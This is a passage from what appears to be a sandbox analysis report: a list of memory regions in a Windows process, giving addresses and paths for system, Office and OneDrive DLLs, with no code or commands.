"\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 638 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 639 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 640 start_va = 0x7fef8240000 end_va = 0x7fef8282fff monitored = 0 entry_point = 0x7fef8261b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 641 start_va = 0x7fef8330000 end_va = 0x7fef844efff monitored = 0 entry_point = 0x7fef834339c region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 642 start_va = 0x7fef8470000 end_va = 0x7fef847afff monitored = 0 entry_point = 0x7fef8475740 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 643 start_va = 0x7fef8480000 end_va = 0x7fef8498fff monitored = 0 entry_point = 0x7fef849077c region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 644 start_va = 0x7fef84a0000 end_va = 0x7fef84c1fff monitored = 0 entry_point = 0x7fef84a1198 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 645 start_va = 0x7fef8580000 end_va = 0x7fef8588fff monitored = 0 entry_point = 0x7fef8582f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 646 start_va = 0x7fef8590000 end_va = 0x7fef85a7fff monitored = 0 entry_point = 0x7fef8591060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 647 start_va = 0x7fef85b0000 end_va = 0x7fef85b9fff monitored = 0 entry_point = 0x7fef85b49f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 648 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 649 start_va = 0x7fef8620000 end_va = 0x7fef865afff monitored = 0 entry_point = 0x7fef8647600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 650 start_va = 0x7fef8660000 end_va = 0x7fef869afff monitored = 0 entry_point = 0x7fef86622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 651 start_va = 0x7fef86a0000 end_va = 0x7fef883bfff monitored = 0 entry_point = 0x7fef86a1030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 652 start_va = 0x7fef8840000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef8841198 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 653 start_va = 0x7fef8860000 end_va = 0x7fef88defff monitored = 0 entry_point = 0x7fef88b385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 654 start_va = 0x7fef88e0000 end_va = 0x7fef891afff monitored = 0 entry_point = 0x7fef88e1070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 655 start_va = 0x7fef8920000 end_va = 0x7fef892afff monitored = 0 entry_point = 0x7fef8921030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 656 start_va = 0x7fef8930000 end_va = 0x7fef89e9fff monitored = 0 entry_point = 0x7fef893115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 657 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 658 start_va = 0x7fef8a70000 end_va = 0x7fef8d12fff monitored = 0 entry_point = 0x7fef8a73498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 659 start_va = 0x7fef8da0000 end_va = 0x7fef8dabfff monitored = 0 entry_point = 0x7fef8da1380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 660 start_va = 0x7fef8db0000 end_va = 0x7fef8de3fff monitored = 0 entry_point = 0x7fef8db1890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 661 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 662 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 663 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 664 start_va = 0x7fef9140000 end_va = 0x7fef9149fff monitored = 0 entry_point = 0x7fef9144938 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 665 start_va = 0x7fef95e0000 end_va = 0x7fef9662fff monitored = 0 entry_point = 0x7fef960692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 666 start_va = 0x7fef9670000 end_va = 0x7fef9679fff monitored = 0 entry_point = 0x7fef9671198 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 667 start_va = 0x7fef9770000 end_va = 0x7fef9782fff monitored = 0 entry_point = 0x7fef977a8b8 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 668 start_va = 0x7fef9880000 end_va = 0x7fef98a7fff monitored = 0 entry_point = 0x7fef9893cc4 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 669 start_va = 0x7fef9950000 end_va = 0x7fef9957fff monitored = 0 entry_point = 0x7fef9951030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 670 start_va = 0x7fef9960000 end_va = 0x7fef99dffff monitored = 0 entry_point = 0x7fef9964a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 671 start_va = 0x7fef99e0000 end_va = 0x7fef99eefff monitored = 0 entry_point = 0x7fef99e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 672 start_va = 0x7fef99f0000 end_va = 0x7fef99fbfff monitored = 0 entry_point = 0x7fef99f1070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 673 start_va = 0x7fef9a00000 end_va = 0x7fef9a7dfff monitored = 0 entry_point = 0x7fef9a01304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 674 start_va = 0x7fef9a80000 end_va = 0x7fef9ab4fff monitored = 0 entry_point = 0x7fef9a8c59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 675 start_va = 0x7fef9ac0000 end_va = 0x7fefa33dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 676 start_va = 0x7fefa340000 end_va = 0x7fefa4f8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 677 start_va = 0x7fefa500000 end_va = 0x7fefa815fff monitored = 0 entry_point = 0x7fefa503e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 678 start_va = 0x7fefa820000 end_va = 0x7fefa822fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 679 start_va = 0x7fefa830000 end_va = 0x7fefa832fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 680 start_va = 0x7fefa840000 end_va = 0x7fefa842fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 681 start_va = 0x7fefa850000 end_va = 0x7fefa852fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 682 start_va = 0x7fefa860000 end_va = 0x7fefa864fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 683 start_va = 0x7fefa870000 end_va = 0x7fefa874fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 684 start_va = 0x7fefa880000 end_va = 0x7fefa882fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 685 start_va = 0x7fefa890000 end_va = 0x7fefa92dfff monitored = 0 entry_point = 0x7fefa8d9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 686 start_va = 0x7fefa930000 end_va = 0x7fefa933fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 687 start_va = 0x7fefa940000 end_va = 0x7fefa943fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 688 start_va = 0x7fefa950000 end_va = 0x7fefa952fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 689 start_va = 0x7fefa960000 end_va = 0x7fefa963fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 690 start_va = 0x7fefa970000 end_va = 0x7fefa972fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 691 start_va = 0x7fefa980000 end_va = 0x7fefa982fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 692 start_va = 0x7fefa990000 end_va = 0x7fefa992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 693 start_va = 0x7fefa9a0000 end_va = 0x7fefa9a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 694 start_va = 0x7fefa9b0000 end_va = 0x7fefa9b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 695 start_va = 0x7fefa9c0000 end_va = 0x7fefa9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 696 start_va = 0x7fefa9d0000 end_va = 0x7fefaac1fff monitored = 0 entry_point = 0x7fefa9d9060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 697 start_va = 0x7fefaad0000 end_va = 0x7fefaad3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 698 start_va = 0x7fefaae0000 end_va = 0x7fefaaf6fff monitored = 0 entry_point = 0x7fefaaec440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 699 start_va = 0x7fefab00000 end_va = 0x7fefad13fff monitored = 0 entry_point = 0x7fefab01000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 700 start_va = 0x7fefad20000 end_va = 0x7fefadedfff monitored = 0 entry_point = 0x7fefad430fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 701 start_va = 0x7fefadf0000 end_va = 0x7fefae96fff monitored = 0 entry_point = 0x7fefae3b93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 702 start_va = 0x7fefaea0000 end_va = 0x7fefaef5fff monitored = 0 entry_point = 0x7fefaea86e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 703 start_va = 0x7fefaf00000 end_va = 0x7fefaf56fff monitored = 0 entry_point = 0x7fefaf01118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 704 start_va = 0x7fefaf60000 end_va = 0x7fefb129fff monitored = 0 entry_point = 0x7fefaf67a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 705 start_va = 0x7fefb130000 end_va = 0x7fefb147fff monitored = 0 entry_point = 0x7fefb131010 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 706 start_va = 0x7fefb150000 end_va = 0x7fefb165fff monitored = 0 entry_point = 0x7fefb151050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 707 start_va = 0x7fefb170000 end_va = 0x7fefb1b2fff monitored = 0 entry_point = 0x7fefb1730d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 708 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 709 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 710 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 711 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 712 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 713 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 714 start_va = 0x7fefb4b0000 end_va = 0x7fefb5d6fff monitored = 0 entry_point = 0x7fefb4b10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 715 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 716 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 717 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 718 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 719 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 720 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 721 start_va = 0x7fefbad0000 end_va = 0x7fefbbf9fff monitored = 0 entry_point = 0x7fefbad3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 722 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 723 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 724 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 725 start_va = 0x7fefbcb0000 end_va = 0x7fefbcbafff monitored = 0 entry_point = 0x7fefbcb1020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 726 start_va = 0x7fefbcc0000 end_va = 0x7fefbcfafff monitored = 0 entry_point = 0x7fefbccf410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 727 start_va = 0x7fefbd00000 end_va = 0x7fefbd42fff monitored = 0 entry_point = 0x7fefbd0c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 728 start_va = 0x7fefbd50000 end_va = 0x7fefbe41fff monitored = 0 entry_point = 0x7fefbd7ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 729 start_va = 0x7fefbe50000 end_va = 0x7fefc064fff monitored = 0 entry_point = 0x7fefc0264b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 730 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 731 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 732 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 733 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 734 start_va = 0x7fefc250000 